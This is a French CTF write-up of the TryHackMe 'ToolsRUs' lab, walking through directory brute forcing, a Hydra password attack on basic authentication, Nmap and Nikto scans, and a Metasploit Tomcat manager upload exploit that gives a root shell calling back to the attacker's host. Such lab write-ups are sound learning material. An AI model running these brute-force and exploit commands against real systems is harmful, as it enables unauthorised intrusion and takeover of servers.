ToolsRUs – WriteUp – TryHackMe

Ce write-up concerne la “room” ToolRus de TryHackMe. Elle est dediée à l’utilisation d’outil permettant la collecte d’information qui pourrait amener à prendre le contrôle de la machine. Les outils qui seront utilisés :

Dirbuster
Hydra
Nmap
Nikto
Metasploit

1. Question 1 : What directory can you find, that begins with a “g”?

Réponse : guidelines

Pour répondre à cette question, on peut configurer et utiliser Dirbuster afin qu’il brute force les répertoires et les noms de fichiers. Dans la mesure où la box est guidé est qu’il n’y a pas d’indication particulière on peut considérer que le serveur web en question se trouve sur le port 80.

2. Question 2 : Whose name can you find from this directory?

Réponse : bob

Pour obtenir la réponse, il suffit de se rendre sur la page web du répertoire trouvé précédemment http://10.10.230.175/guidelines

3. Question 3 : What directory has basic authentication?

Réponse : protected

De la même manière que pour la réponse 1, il faut reprendre le scan de Dirbuster qui est toujours en cours et voir si de nouveau répertoires ont été trouvé.

4 Question 4 : What is bob’s password to the protected part of the website?

Réponse : bubbles

Pour répondre a cette question, il faut utiliser hydra qui va “brute forcer” l’authentification avec cette ligne de commande :

hydra 10.10.230.175 -l bob -P /usr/share/wordlists/rockyou.txt http-get /protected/

5. question 5 : What other port that serves a webs service is open on the machine?

Réponse : 1234

Il faut utiliser nmap pour trouver la réponse. J’ai utilisé l’option -T5 et -p- afin de scanner tous les ports tcp/ip rapidement. Comme on peut le voir dans la capture suivant, le scan a pris un moins d1 minute.

nmap -T5 -p- 10.10.230.175

6. Question 6 : Going to the service running on that port, what is the name and version of the software?

Réponse : Apache Tomcat/7.0.88

A nouveau, on utilise nmap mais avec l’option -sC et -sV uniquement sur le port 1234

nmap -sC -sV -p 1234 10.10.230.175

7. Question 7 : How many documentation files did Nikto identify? Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above.

Réponse : 5

Comme indiqué dans la question, j’utilise Nitko, avec cette ligne de commande.

nikto -id bob:bubbles -h http://10.10.230.175:1234/manager/html

L’option -id permettra à Nikto de s’authentifier et de scanner le site en tant de bob.

8. Question 8 : What is the server version (run the scan against port 80)?

Réponse : Apache/2.4.18

Même utilisation avec nmap que la question 6 sur le port 80 :

nmap -sC -sV -p 80 10.10.230.175

9. question 9 : What version of Apache-Coyote is this service using?

Réponse : 1.1

On connait déjà la réponse, avec le résultat du scan de la question 6.

10. Question 10 : What user did you get a shell as? Use Metasploit to exploit the service and get a shell on the system.

Réponse : root

Avant d’arriver à passer root, il faut d’abord trouvé lexploit qui permettra d’obetnir un shell sur le système. Pour cela il faut faire une recherche sur Google avec les mots clés suivant tomcat 7 manager exploitdb metasploit .

Il faut ensuite lancer Metasploit et chercher le bon exploit dans la console. Voici la liste des commandes afin d’obtenir les droits root sur le système

msfconsole

msf6 > search tomcat 7 upload

msf6 > use 15

msf6 exploit(multi/http/tomcat_mgr_upload) > set httppassword bubbles

msf6 exploit(multi/http/tomcat_mgr_upload) > set httpusername bob

msf6 exploit(multi/http/tomcat_mgr_upload) > set rhosts 10.10.230.175

msf6 exploit(multi/http/tomcat_mgr_upload) > set rport 1234

msf6 exploit(multi/http/tomcat_mgr_upload) > set lhost 10.8.76.250

msf6 exploit(multi/http/tomcat_mgr_upload) > show options

msf6 exploit(multi/http/tomcat_mgr_upload) > run

Revenir au menu TryHackMe Revenir au menu Principale

Articles similaires